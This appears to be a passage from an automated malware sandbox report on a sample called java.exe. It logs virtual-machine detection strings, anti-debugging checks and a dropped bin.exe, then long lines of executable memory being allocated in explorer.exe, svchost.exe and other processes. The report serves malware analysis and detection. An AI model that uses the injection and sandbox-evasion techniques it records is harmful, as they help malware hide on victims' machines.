Client\vFVPNClientExe.exe12443Microsoft.Website.7304A502.2C8DDE7D12444{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\Eye4\SuperIPCam.exe12444{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\Kingston_SSD_Manager\KSM.exe1244528619Prajakta-Patil.VidmateTube-VideoDownloader_kxnpj9d1cxdgg!App1244621676OptimiliaStudios.iDownload-Manager_k42naep6bwmrc!App12446discord:///library/519338998791929866/launch12446A278AB0D.GangstarNewOrleans_h6adky7gbf63m!App12446{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\MTech\hotsos\client_na4\HotSOS.exe12446{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\TechSmith\Camtasia Studio 7\CamRecorder.exe12446{6D809377-6AF0-444B-8957-A3773F02200E}\Corel\Corel PaintShop Pro 2019 (64-bit)\Corel PaintShop Pro.exe12446{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\EPSON Software\Document Capture\DocumentCapture.exe12446{6D809377-6AF0-444B-8957-A3773F02200E}\Aruba Networks\Virtual Internet Agent\anuacui.exe12447RhapsodyInternationalInc.Napster_zddp1e08a7b6t!App12447{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\Netease\HSA\HSAng.exe12447{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\Free Spider Solitaire\FreeSpider.exe12447{6D809377-6AF0-444B-8957-A3773F02200E}\IVPN Client\IVPN Client.exe12447{6D809377-6AF0-444B-8957-A3773F02200E}\Tablet\Wacom\32\LCDSettings.exe12447Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy!App12448{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\Droid4X\Droid4X.exe12448{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\Adobe\Photoshop CS4\Photoshop.exe12448{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\HideMy.name VPN\Start.exe12448{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\Loxysoft\ICC Agent\ICCAgentLauncher.exe12449{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\PST\ProposalWorks\PropBldr.exe12450{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\TeameeVo\Sims 4 Tray Importer (S4TI)\S4TI.exe12450Toolkit12451VMware.View.Client12451{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\Infor\Query and Analysis\VSetup.exe12451{7C5A40EF-A0FB-4BFC-874A-C0F
            Source: explorer.exe, 00000003.00000000.1715884676.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD00\w
            Source: explorer.exe, 00000003.00000000.1715884676.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
            Source: explorer.exe, 00000003.00000002.3093722755.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
            Source: SearchApp.exe, 0000000B.00000003.1889783869.0000024B42245000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: 200E}\Mic*|vmware horizon client*|vm ware8394
            Source: SearchApp.exe, 0000000B.00000003.1889409291.0000024B42223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: *|vmware vsphere client*|vspe6388
            Source: SearchApp.exe, 0000000B.00000003.1889409291.0000024B42223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: *|vmware horizon client*|vdi3894
            Source: SearchApp.exe, 0000000B.00000003.1889409291.0000024B42223000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000B.00000003.1889880818.0000024B5CB61000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: *|hyper-v manager*|hyper v4919
            Source: SearchApp.exe, 0000000B.00000003.1889783869.0000024B42245000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\VMware\VMware vCenter Converter Standalone\converter.exe12207
            Source: SearchApp.exe, 0000000B.00000003.1889409291.0000024B42223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: *|vmware horizon client*|view5503
            Source: svchost.exe, 00000005.00000000.1792111945.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @os=windows; osVer=10.0.19045.2006; lcid=en-GB; deviceType=9; deviceModel=VMware, Inc./VMware20,1;
            Source: SearchApp.exe, 0000000B.00000003.1889783869.0000024B42245000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: 0E}\Minitab\Min*|vmware horizon client*|vmare7220
            Source: SearchApp.exe, 0000000B.00000000.1888021587.0000024B55466000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: lyncvmwareonenoteneroXK
            Source: SearchApp.exe, 0000000B.00000003.1889409291.0000024B42223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: *|vmware vsphere client*|vcenter5038
            Source: explorer.exe, 00000003.00000002.2977124293.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
            Source: C:\Users\user\Desktop\java.exeAPI call chain: ExitProcess graph end nodegraph_0-3090
            Source: C:\Windows\SysWOW64\winver.exeAPI call chain: ExitProcess graph end nodegraph_2-2669
            Source: C:\Users\user\AppData\Roaming\E38A1E29\bin.exeAPI call chain: ExitProcess graph end nodegraph_12-5897
            Source: C:\Users\user\AppData\Roaming\E38A1E29\bin.exeAPI call chain: ExitProcess graph end nodegraph_12-5411
            Source: C:\Users\user\AppData\Roaming\E38A1E29\bin.exeAPI call chain: ExitProcess graph end nodegraph_12-5583
            Source: C:\Users\user\AppData\Roaming\E38A1E29\bin.exeAPI call chain: ExitProcess graph end node
            Source: C:\Users\user\AppData\Roaming\E38A1E29\bin.exeAPI call chain: ExitProcess graph end node
            Source: C:\Users\user\AppData\Roaming\E38A1E29\bin.exeAPI call chain: ExitProcess graph end node
            Source: C:\Users\user\AppData\Roaming\E38A1E29\bin.exeAPI call chain: ExitProcess graph end node
            Source: C:\Windows\SysWOW64\winver.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\java.exeCode function: 0_2_02220005 rdtsc 0_2_02220005
            Source: C:\Users\user\Desktop\java.exeCode function: 0_2_00401000 mov eax, dword ptr fs:[00000030h]0_2_00401000
            Source: C:\Users\user\Desktop\java.exeCode function: 0_2_02220C63 mov eax, dword ptr fs:[00000030h]0_2_02220C63
            Source: C:\Windows\SysWOW64\winver.exeCode function: 2_2_047E0C3F mov eax, dword ptr fs:[00000030h]2_2_047E0C3F
            Source: C:\Windows\explorer.exeCode function: 3_2_01390C3F mov eax, dword ptr fs:[00000030h]3_2_01390C3F
            Source: C:\Windows\explorer.exeCode function: 3_2_03450C3F mov eax, dword ptr fs:[00000030h]3_2_03450C3F
            Source: C:\Windows\System32\sihost.exeCode function: 4_2_00AC0C3F mov eax, dword ptr fs:[00000030h]4_2_00AC0C3F
            Source: C:\Windows\System32\svchost.exeCode function: 5_2_00910C3F mov eax, dword ptr fs:[00000030h]5_2_00910C3F
            Source: C:\Windows\System32\svchost.exeCode function: 6_2_009A0C3F mov eax, dword ptr fs:[00000030h]6_2_009A0C3F
            Source: C:\Windows\System32\ctfmon.exeCode function: 7_2_00A50C3F mov eax, dword ptr fs:[00000030h]7_2_00A50C3F
            Source: C:\Windows\System32\svchost.exeCode function: 8_2_00D40C3F mov eax, dword ptr fs:[00000030h]8_2_00D40C3F
            Source: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exeCode function: 9_2_00B50C3F mov eax, dword ptr fs:[00000030h]9_2_00B50C3F
            Source: C:\Windows\System32\RuntimeBroker.exeCode function: 10_2_00110C3F mov eax, dword ptr fs:[00000030h]10_2_00110C3F
            Source: C:\Users\user\AppData\Roaming\E38A1E29\bin.exeCode function: 12_2_001C0C3F mov eax, dword ptr fs:[00000030h]12_2_001C0C3F
            Source: C:\Users\user\AppData\Roaming\E38A1E29\bin.exeCode function: 12_2_02240C63 mov eax, dword ptr fs:[00000030h]12_2_02240C63
            Source: C:\Windows\System32\RuntimeBroker.exeCode function: 17_2_00AB0C3F mov eax, dword ptr fs:[00000030h]17_2_00AB0C3F
            Source: C:\Windows\System32\smartscreen.exeCode function: 18_2_00290C3F mov eax, dword ptr fs:[00000030h]18_2_00290C3F
            Source: C:\Users\user\AppData\Roaming\E38A1E29\bin.exeCode function: 19_2_001C0C3F mov eax, dword ptr fs:[00000030h]19_2_001C0C3F
            Source: C:\Users\user\AppData\Roaming\E38A1E29\bin.exeCode function: 19_2_02410C63 mov eax, dword ptr fs:[00000030h]19_2_02410C63
            Source: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exeCode function: 21_2_00580C3F mov eax, dword ptr fs:[00000030h]21_2_00580C3F
            Source: C:\Windows\System32\RuntimeBroker.exeCode function: 22_2_003D0C3F mov eax, dword ptr fs:[00000030h]22_2_003D0C3F
            Source: C:\Windows\System32\RuntimeBroker.exeCode function: 23_2_00900C3F mov eax, dword ptr fs:[00000030h]23_2_00900C3F
            Source: C:\Windows\System32\ApplicationFrameHost.exeCode function: 24_2_00180C3F mov eax, dword ptr fs:[00000030h]24_2_00180C3F
            Source: C:\Windows\System32\RuntimeBroker.exeCode function: 26_2_00190C3F mov eax, dword ptr fs:[00000030h]26_2_00190C3F
            Source: C:\Windows\System32\oobe\UserOOBEBroker.exeCode function: 28_2_00010C3F mov eax, dword ptr fs:[00000030h]28_2_00010C3F
            Source: C:\Windows\System32\svchost.exeCode function: 29_2_009F0C3F mov eax, dword ptr fs:[00000030h]29_2_009F0C3F
            Source: C:\Windows\System32\conhost.exeCode function: 30_2_00880C3F mov eax, dword ptr fs:[00000030h]30_2_00880C3F
            Source: C:\Windows\System32\dllhost.exeCode function: 31_2_00980C3F mov eax, dword ptr fs:[00000030h]31_2_00980C3F
            Source: C:\Windows\System32\RuntimeBroker.exeCode function: 33_2_00A20C3F mov eax, dword ptr fs:[00000030h]33_2_00A20C3F
            Source: C:\Windows\System32\RuntimeBroker.exeCode function: 34_2_00060C3F mov eax, dword ptr fs:[00000030h]34_2_00060C3F
            Source: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exeCode function: 35_2_03070C3F mov eax, dword ptr fs:[00000030h]35_2_03070C3F
            Source: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exeCode function: 36_2_02CE0C3F mov eax, dword ptr fs:[00000030h]36_2_02CE0C3F
            Source: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exeCode function: 37_2_00640C3F mov eax, dword ptr fs:[00000030h]37_2_00640C3F
            Source: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exeCode function: 38_2_006D0C3F mov eax, dword ptr fs:[00000030h]38_2_006D0C3F
            Source: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exeCode function: 39_2_02EF0C3F mov eax, dword ptr fs:[00000030h]39_2_02EF0C3F
            Source: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exeCode function: 40_2_01470C3F mov eax, dword ptr fs:[00000030h]40_2_01470C3F
            Source: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exeCode function: 41_2_01160C3F mov eax, dword ptr fs:[00000030h]41_2_01160C3F
            Source: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exeCode function: 42_2_01FF0C3F mov eax, dword ptr fs:[00000030h]42_2_01FF0C3F
            Source: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exeCode function: 43_2_02630C3F mov eax, dword ptr fs:[00000030h]43_2_02630C3F
            Source: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exeCode function: 44_2_00810C3F mov eax, dword ptr fs:[00000030h]44_2_00810C3F

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Allocates memory in foreign processes
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Windows\explorer.exe base: 1390000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Windows\System32\sihost.exe base: AC0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Windows\System32\svchost.exe base: 910000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Windows\System32\svchost.exe base: 9A0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Windows\System32\ctfmon.exe base: A50000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Windows\explorer.exe base: 3450000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Windows\System32\svchost.exe base: D40000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: B50000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 110000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: A90000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: AB0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Windows\System32\smartscreen.exe base: 290000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 580000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 3D0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 900000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: 180000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: A10000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 190000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: F10000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 10000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Windows\System32\svchost.exe base: 9F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Windows\System32\conhost.exe base: 880000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Windows\System32\dllhost.exe base: 980000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Windows\System32\backgroundTaskHost.exe base: C0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: A20000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 60000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 3070000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 2CE0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 640000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 6D0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 2EF0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 1470000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 1160000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 1FF0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 2630000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 810000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 2CF0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 13C0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 870000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 2210000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: C30000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 25E0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 2AB0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 2410000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 13E0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 2DF0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 1150000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: D20000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 2500000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 1520000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 2EB0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: FC0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 29A0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 2750000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 29D0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 15B0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 660000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 1030000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 2AF0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 3030000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 12F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 10E0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: DD0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 1180000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 29B0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 24C0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 9D0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 940000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: FF0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: E70000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 2D90000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeMemory allocated: C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe base: 12A0000 protect: page execute and read and writeJump to behavior
